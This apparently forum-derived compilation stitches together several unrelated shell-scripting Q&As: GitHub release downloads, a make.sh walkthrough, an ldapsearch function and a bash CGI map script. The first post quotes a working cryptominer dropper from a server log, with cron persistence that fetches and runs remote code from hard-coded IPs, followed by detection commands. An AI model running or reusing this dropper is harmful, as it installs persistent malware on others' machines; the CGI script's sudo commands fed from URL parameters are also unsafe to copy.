tar -x -v -z -f abc.tar.gz -C ~/libs/dl/ | cut -d '/' -f 1 | sort | uniq >> `dirname ~/libs/dl/`/.extracted_dirs
The code below showed up in my python3 server log, on my Ubuntu 20.04 Linux desktop system. Is it just my suspicious nature, or was this an attempt to hack my computer?
cc=http://31.42.177.123
sys=sysrv005
bit=$(getconf LONG_BIT)
ps aux | grep kthreaddi | grep tmp | awk '{print $2}' | xargs -I % kill -9 %
ps aux | egrep 'sysrv001|sysrv002|sysrv003|sysrv004|network01|network00' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep sysrv | grep -v 0 | awk '{print $2}' | xargs -I % kill -9 %
crontab -r
echo "*/30 * * * * (curl --user-agent curl_cron $cc||wget --user-agent wget_cron -q -O - $cc)|sh" | crontab -
#pkill -9 $sys
get() {
chattr -i $2; rm -rf $2
curl --user-agent curl_ldr$bit -fsSL $1 > $2 || wget --user-agent wget_ldr$bit -q -O - $1 > $2 || php -r "file_put_contents('$2', file_get_contents('$1'));"
chmod +x $2
}
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
ps -fe | grep $sys | grep -v grep; if [ $? -ne 0 ]; then
get 31.210.20.120/sysrvv $sys; ./$sys
fi
Yes, it's a Bitcoin miner.
31.42.177.123/... basically serves the shell script above, which in turn contacts 31.210.20.120 to download the sysrvv file, and that file is the actual Bitcoin miner.
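If you want to check how far the dropper got on your machine, a minimal check could look like this (a sketch, assuming the script ran as the same user):
# look for the injected cron entry that re-downloads the payload every 30 minutes
crontab -l | grep -E 'curl_cron|wget_cron'
# look for running miner processes under the names the script itself uses
ps aux | grep -E 'sysrv|kthreaddi' | grep -v grep
If either command turns something up, treat the machine as compromised rather than just deleting the entries.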
Objective:
I'm trying to write a script that will fetch two URLs from a GitHub release page and do something different with each one.
So far:
Here's what I've got so far.
λ curl -s https://api.github.com/repos/mozilla-iot/gateway/releases/latest | grep "browser_download_url.*tar.gz" | cut -d : -f 2,3 | tr -d \"
This will return the following:
"https://github.com/mozilla-iot/gateway/releases/download/0.8.1/gateway-8c29257704ddb021344bdaaa790909a0eacf3293bab94e02859828a6fd9b900a.tar.gz"
"https://github.com/mozilla-iot/gateway/releases/download/0.8.1/node_modules-921bd0d58022aac43f442647324b8b58ec5fdb4df57a760e1fc81a71627f526e.tar.gz"
I want to be able to create some directories, pull in the first one, navigate into the directories created by extracting it, and then pull in the second.
Fetching the first line is easy by piping the output to head -n1, but solving your problem takes more than just grabbing the first URL from the cURL output. Give this a try:
#!/bin/bash
# fetch your URLs, one per line, with quotes and spaces stripped
answer=$(curl -s https://api.github.com/repos/mozilla-iot/gateway/releases/latest | grep "browser_download_url.*tar.gz" | cut -d : -f 2,3 | tr -d '" ')
# split out the two URLs and derive their file names
first_file=$(echo "$answer" | head -n1)
second_file=$(echo "$answer" | head -n2 | tail -n1)
first_file_name=${first_file##*/}    # strip everything up to the last slash
second_file_name=${second_file##*/}
#echo $first_file
#echo $first_file_name
#echo $second_file_name
#echo $second_file
# download the first file
wget "$first_file"
# extract the first one, which must be in the current directory.
# else, change the directory first and put the path before $first_file_name!
tar -xzf "$first_file_name"
# do your stuff with the second file
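As an aside, if jq is available, the URL extraction itself is less brittle than grepping the raw JSON; a sketch, assuming the release JSON has its usual assets array:
curl -s https://api.github.com/repos/mozilla-iot/gateway/releases/latest |
    jq -r '.assets[].browser_download_url | select(endswith("tar.gz"))'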
You can simply pipe the URLs to xargs curl; since curl applies one -O per URL, have xargs run one curl invocation per URL:
curl -s https://api.github.com/repos/mozilla-iot/gateway/releases/latest |
grep "browser_download_url.*tar.gz" |
cut -d : -f 2,3 | tr -d \" |
xargs -n1 curl -O
Or if you want to do some more manipulation on each URL, perhaps loop over the results:
curl ... | grep ... | cut ... | tr ... |
while IFS= read -r url; do
curl -O "$url"
: maybe do things with "$url" here
done
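The IFS= and -r are deliberate: IFS= stops read from trimming leading and trailing whitespace, and -r stops it from treating backslashes as escape characters, so each URL arrives verbatim.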
The latter could easily be extended to something like
... | while IFS= read -r url; do
d=${url##*/}
mkdir -p "$d"
( cd "$d"
curl -O "$url"
tar zxf *.tar.gz
# end of subshell means effects of "cd" end
)
done
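The ${url##*/} used above is plain parameter expansion: it removes the longest prefix matching */, leaving the last path component. A quick demonstration:
url=https://example.com/path/file.tar.gz
echo "${url##*/}"    # prints file.tar.gz
Note this names each directory after the full tarball name, .tar.gz extension included.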
I am confused by this make.sh file. I read previous posts about shell script structure, but I could not find anything about this file. What is the function of this file? ...
Can anyone explain it step by step?
#!/bin/sh
rm out/*
example_number=0
for name in `ls in`
do
out=`cat in/$name | grep ".o " | tr -s \ | cut -d\ -f2`
inp=`cat in/$name | grep ".i " | tr -s \ | cut -d\ -f2`
echo -n "${name} (i=${inp}, o=${out}) "
if [ $inp -le 12 ]
then
cat in/$name \
| sed '/.i/d' \
| sed '/.o/d' \
| sed '/.p/d' \
| sed '/.e/d' \
| sed 's/|/ /g' \
| tr -s \ \
| sed 's/^[ \t]*//;s/[ \t]*$//' \
> out/${name}.in
tst=`cat out/${name}.in | cut -d\ -f2 | grep - -c`
if [ $tst -ne 0 ]
then
echo "remove file"
rm out/${name}.in
else
echo processing...
./unix2dos.exe -q out/${name}.in
example_number=`expr $example_number + 1`
fi
else
echo " skip"
fi
done
for name in `grep 2 -l out/*`
do
echo Remove $name
rm $name
example_number=`expr $example_number - 1`
done
echo Number of examples is $example_number
# bad files
# apla ( 222? )
# tms
# mainpa...
It is not a Makefile, but a shell script. You can see this from the file extension .sh and from the header
#!/bin/sh
which is the instruction to use /bin/sh to execute this file.
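As for the steps, the .i/.o/.p/.e markers suggest the files in in/ are truth tables in Berkeley PLA (espresso) format, where ".i N" gives the number of inputs and ".o N" the number of outputs; that is an inference from the markers, not something the script states. Under that assumption:
rm out/* empties the output directory, and the loop visits every file in in/.
out and inp pull the second whitespace-separated field of the ".o " and ".i " lines; tr -s ' ' squeezes runs of spaces so that cut lands on the number. For example:
echo ".i   12" | tr -s ' ' | cut -d ' ' -f2
prints 12.
Files with more than 12 inputs are skipped. Otherwise the sed chain deletes the .i/.o/.p/.e lines, replaces | with spaces, squeezes whitespace and trims it at both ends, and writes the result to out/${name}.in.
tst counts the lines whose second field contains a - (a don't-care bit in PLA notation); such files are removed again, while the rest are converted to DOS line endings with unix2dos and counted in example_number.
The final loop (grep 2 -l out/* lists the names of matching files) deletes any remaining output file containing the character 2, decrementing the counter, and the script prints how many examples are left. The trailing comments just list input files known to be bad.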
How can I get the directory for a specified DN with one ldapsearch request?
I mean: I have a few databases, and OpenLDAP is configured with cn=config. Each DN has its own ldif file, where its olcDbDirectory is specified.
Can I obtain the olcDbDirectory value for each DN?
For a backup script I need to set a variable which contains the directory, and this variable changes for every DN which is being backed up/restored at that moment.
So, in bash I found a solution: create a function like this:
#!/bin/bash
getDir () {
file=`grep -R "$1" /etc/openldap/slapd.d/ | cut -d":" -f 1 | tail -n 1`
echo $file
dir=`cat $file | grep "olcDbDirectory" | awk '{print $2}'`
echo $dir
}
getDir testdb;
$ ./dn.sh
/etc/openldap/slapd.d/cn=config/olcDatabase={9}bdb.ldif
/var/lib/ldap/testdb
But this solution does not seem tidy... And I'd prefer to use something like:
getDir () {
dir=`ldapsearch -x -D "cn=root,cn=config" "*somefilter*"`
}
Here it is:
$ ldapsearch -x -LLL -D 'cn=root,cn=config' -w PassWord -b 'cn=config' '(&(olcDbDirectory=*)(olcSuffix='testdb'))' olcDbDirectory | grep "olcDbDirectory" | cut -d":" -f 2
/var/lib/ldap/testdb
Or as a bash function:
#!/bin/bash
getDir () {
dirtodel=`ldapsearch -x -LLL -D 'cn=root,cn=config' -w PassWord -b 'cn=config' '(&(olcDbDirectory=*)(olcSuffix='${1}'))' olcDbDirectory | grep "olcDbDirectory" | cut -d":" -f 2`
echo $dirtodel
}
getDir 'dc=testdb'
Result:
$ ./dn.sh
/var/lib/ldap/testdb
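The same thing reads a little tighter if your ldapsearch supports -o ldif-wrap=no (so long values are not wrapped across lines), letting awk do both the matching and the trimming of the leading space; a sketch:
#!/bin/bash
getDir () {
    dirtodel=$(ldapsearch -x -LLL -o ldif-wrap=no -D 'cn=root,cn=config' -w PassWord -b 'cn=config' "(&(olcDbDirectory=*)(olcSuffix=$1))" olcDbDirectory | awk '/^olcDbDirectory:/ {print $2}')
    echo "$dirtodel"
}
getDir 'dc=testdb'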
I am trying to build a Bash CGI script that takes coordinates as parameters from the URL and uses osmosis to extract the map, then splitter and mkgmap to build the map so that it can be opened with QLandkarte. My problem is that when I type wget localhost/cgi-bin/script.pl?top=42&left=10&bottom=39&right=9&file=map.osm, the Linux terminal reads the file with the coordinates. How can I make wget just activate the script, so that it takes the coordinates and executes the commands? Also, when the map is created at the end, how can I return the file that was created by the script?
Thanks
#!/bin/bash
# CGI output must start with the headers, so send them before anything else
echo "Content-type: text/html"
echo ""
TOP=`echo "$QUERY_STRING" | grep -oE "(^|[?&])top=[0-9.]+" | cut -f 2 -d "=" | head -n1`
LEFT=`echo "$QUERY_STRING" | grep -oE "(^|[?&])left=[0-9.]+" | cut -f 2 -d "=" | head -n1`
BOTTOM=`echo "$QUERY_STRING" | grep -oE "(^|[?&])bottom=[0-9.]+" | cut -f 2 -d "=" | head -n1`
RIGHT=`echo "$QUERY_STRING" | grep -oE "(^|[?&])right=[0-9.]+" | cut -f 2 -d "=" | head -n1`
FILE=`echo "$QUERY_STRING" | grep -oE "(^|[?&])file=[^&]+" | sed "s/%20/ /g" | cut -f 2 -d "="`
# run the commands directly; wrapping them in $(...) would try to execute their output
sudo osmosis --read-xml file=bulgaria.osm --bounding-box top="$TOP" left="$LEFT" bottom="$BOTTOM" right="$RIGHT" --write-xml file="$FILE"
sudo java -Xmx900m -jar splitter.jar --max-nodes=110000 "$FILE"
sudo java -ea -Xmx900m -jar mkgmap.jar --tdbfile --route -c template.args